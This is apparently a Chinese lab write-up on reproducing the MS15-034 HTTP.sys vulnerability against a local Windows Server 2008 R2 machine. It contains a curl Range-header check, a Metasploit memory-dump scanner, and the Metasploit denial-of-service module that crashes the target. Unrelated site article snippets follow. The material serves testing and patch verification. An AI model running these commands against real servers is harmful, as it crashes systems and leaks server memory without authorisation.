漏洞复现MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞

news/2024/12/2 6:40:08/

漏洞描述:在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。
漏洞影响范围:IIS 7.0以上的Windows 7/8/8.1和Windows Server 2008 R2/Server 2012/Server 2012 R2等操作系统。

一、环境搭建

攻击机:kali (192.168.2.129)

服务机:windows Server 2008 R2  (192.168.2.130)

win2008安装web服务

 

kali访问成功

二、漏洞验证

验证1.

kali终端输入

curl -v http://192.168.2.130 -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"

 

返回状态码为416且出现The requested range is not satisfiable.则表示该漏洞存在。

验证2.

使用kali的msfconsole框架进行扫描

msfconsole
msf6> use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
msf6> set rhosts 192.168.2.130 //目标地址
msf6> run

 

 

三、漏洞利用

注意事项:该利用会导致目标机器蓝屏重启,请谨慎使用!

使用msfconsole框架进行利用

msfconsolemsf6> use auxiliary/dos/http/ms15_034_ulonglongadd msf6> set rhosts 192.168.2.130msf6> set threads 10msf6> run

 

 四、修补漏洞

打微软官方补丁。


http://www.ppmy.cn/news/220200.html

相关文章

【Rust日报】2023-06-02 Rust 1.70.0 稳定版发布

Rust 1.70.0 稳定版发布 Rust 团队很高兴地宣布 Rust 的新版本 1.70.0。Rust 是一种编程语言,它使每个人都能构建可靠、高效的软件。 最大的特性是,OnceCell稳定版可用啦。 如果你通过 rustup 安装了以前版本的 Rust,你可以通过以下方式获得 …

超级智能的治理

原文链接:https://openai.com/blog/governance-of-superintelligence#SamAltman 作者丨Sam Altman,Greg Brockman,Ilya Sutskever 译者 | Ted Liu 审校 | LsssY 编辑丨肖钰雯 现在是开始思考超级智能治理的好时机--未来的人工智能系统甚至比通…

伺服驱动器的工作原理及伺服驱动器的常见接线方法

伺服驱动器在控制信号的作用下驱动执行电机,因此驱动器是否能正常工作直接影响设备的整体性能。在伺服控制系统中,伺服驱动器相当于大脑,执行电机相当于手脚。而伺服驱动器在伺服控制系统中的作用就是调节电机的转速,因此也是一个…

SS00027.algorithm——|ArithmeticMachine.v27|——|Machine:项目实战.v04|竞争分析|

一、竞争分析 ### --- 竞争分析 ~~~ 依据之前的top100品牌数据,分析市场份额前三的商家:拜耳,科凌虫控,安速。### --- 分析流程 ~~~ 人群画像分析:三个品牌的人群特征基本一致(这里省略)。 ~~~ 品类分布&a…

海豚蓝牙ASIO软件设置方法

1.为什么要使用海豚蓝牙音箱,能带给我什么样的音乐体验 目前市面上的蓝牙音箱基本上是一个全频段的喇叭来播放CD音质的音乐,如果是立体声的是不能通过一个喇叭来播放,无法实现空间上的立体效果 ,必须像漫步者的2.1级音箱一样&…

海豚蓝牙ASIO驱动程序使用说明

1.为什么要使用海豚蓝牙音箱,能带给我什么样的音乐体验 目前市面上的蓝牙音箱基本上是一个全频段的喇叭来播放CD音质的音乐,如果是立体声的是不能通过一个喇叭来播放,无法实现空间上的立体效果 ,必须像漫步者的2.1级音箱一样&…

MySQL从MyISAM引擎转换到InnoDB引擎需要注意的地方

MySQL从MyISAM引擎转换到InnoDB引擎需要注意的地方 来源:易贤网 阅读:1852 次 日期:2015-01-09 11:48:13 科凌 A5无线蓝牙音箱手机迷你电脑音响插卡便携式车载低音小钢炮女包2017夏季新款日韩版时尚简约流苏小方包手提包单肩斜挎小包包昂达…

读书笔记2014第12本:《创新者的窘境》

这本书中的理论可能对于国企员工并无大用,但作为一员科研工作者,整天在总结创新性技术,也算是创新者吧,所以就想了解创新者会遇到什么窘境?全书啰啰嗦嗦就为了说明一个观点:一些优秀企业在市场变化和技术变…